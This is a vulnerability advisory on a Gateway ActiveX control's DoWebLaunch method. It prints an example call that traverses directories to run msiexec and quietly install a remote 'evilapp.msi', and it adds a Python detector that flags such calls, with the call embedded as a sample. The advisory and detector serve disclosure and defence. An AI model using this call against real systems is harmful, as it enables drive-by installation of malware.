
Gateway CWebLaunchCtl ActiveX Control Command Execution and Remote Buffer Overflow Vulnerability

The following example call to the vulnerable method demonstrates executing a local script:

obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe", "","/i http://www.example.com/evilapp.msi /quiet");

UPDATE (March 26, 2008): The Symantec DeepSight Team has discovered that the issue affecting 'WebLaunch2.ocx' is being actively exploited in the wild.
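Added example, not part of the original advisory: a static content check in Python that flags DoWebLaunch calls whose second argument contains a parent-directory component, as in the call shown above. The function names and both sample pages are assumptions constructed for illustration; script that builds the call dynamically or obfuscates it is not matched.

```python
import re

# Call site and raw argument list. Matched case-insensitively to be
# conservative; an argument containing ')' would truncate the match.
CALL_RE = re.compile(r'\.DoWebLaunch\s*\(([^)]*)\)', re.IGNORECASE)
# A JavaScript string literal, single or double quoted, with backslash escapes.
STR_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')


def js_unescape(literal):
    """Collapse simple escapes (\\\\ -> \\, \\" -> "); enough for path checks."""
    return re.sub(r'\\(.)', r'\1', literal)


def string_args(arglist):
    """Return the string-literal arguments of one call, unescaped, in order."""
    return [js_unescape(m.group(1) if m.group(1) is not None else m.group(2))
            for m in STR_RE.finditer(arglist)]


def find_suspicious_weblaunch(page):
    """Flag DoWebLaunch calls whose 2nd argument climbs out of its directory."""
    findings = []
    for call in CALL_RE.finditer(page):
        args = string_args(call.group(1))
        if len(args) < 2:
            continue
        target = args[1]
        parts = re.split(r'[\\/]+', target)
        depth = parts.count('..')
        if depth:
            findings.append({
                'target': target,                            # path as the control sees it
                'depth': depth,                              # number of '..' components
                'params': args[3] if len(args) > 3 else '',  # 4th argument of the call
            })
    return findings


# Constructed sample pages: the first embeds the call quoted in this advisory,
# the second is a hypothetical call with no traversal.
SAMPLE_FLAGGED = r'''<script>obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe", "","/i http://www.example.com/evilapp.msi /quiet");</script>'''
SAMPLE_CLEAN = r'''<script>obj.DoWebLaunch("","helper.exe","","");</script>'''

if __name__ == "__main__":
    for hit in find_suspicious_weblaunch(SAMPLE_FLAGGED):
        print("traversal depth %(depth)d -> %(target)s [%(params)s]" % hit)
```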

A proof of concept for executing local scripts and an exploit for the buffer-overflow issue are available:







 

Copyright 2009, SecurityFocus